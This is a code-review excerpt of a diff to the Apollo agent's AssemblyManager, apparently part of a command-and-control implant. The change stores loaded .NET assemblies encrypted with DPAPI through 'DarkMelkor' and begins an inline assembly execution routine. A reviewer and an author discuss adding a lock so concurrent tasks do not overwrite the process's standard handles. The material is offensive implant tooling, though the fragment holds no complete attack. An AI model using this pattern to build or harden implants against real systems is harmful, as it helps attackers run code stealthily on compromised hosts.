Payload_Type/apollo/agent_code/Apollo/CommandModules/AssemblyManager.cs

```diff
@@ -126,27 +134,73 @@ private static void DeleteAssembly(string key)
             }
         }
 
-        private static void AddAssembly(string key, byte[] bytes)
+        private static void AddAssembly(string key, DarkMelkor.DPAPI_MODULE enc_bytes)
         {
             lock (loadedAssemblies)
             {
                 if (loadedAssemblies.ContainsKey(key))
-                    loadedAssemblies[key] = bytes;
+                    loadedAssemblies[key] = enc_bytes;
                 else
-                    loadedAssemblies.Add(key, bytes);
+                    loadedAssemblies.Add(key, enc_bytes);
             }
         }
 
-        private static byte[] GetAssembly(string key)
+        private static DarkMelkor.DPAPI_MODULE GetAssembly(string key)
         {
-            byte[] asm = null;
+            DarkMelkor.DPAPI_MODULE asm;
             lock (loadedAssemblies)
             {
                 asm = loadedAssemblies[key];
             }
             return asm;
         }
 
+#if INLINE_ASSEMBLY
+        static void InlineAssembly(Job job, Agent implant)
+        {
+            Task task = job.Task;
```

Comment:
I'm reasonably certain you need to add a locking mechanism for this task. From the DarkMelkor code, you're modifying the std handles, and if two inline tasks execute concurrently, we'll lose the original handles to the process (not good). By implementing a lock on a static object we ensure task concurrency doesn't stomp on each other, and we simply accept this is a limitation of this function.

Reply:
Added locking mechanism through the variable "inline_assembly_Locker".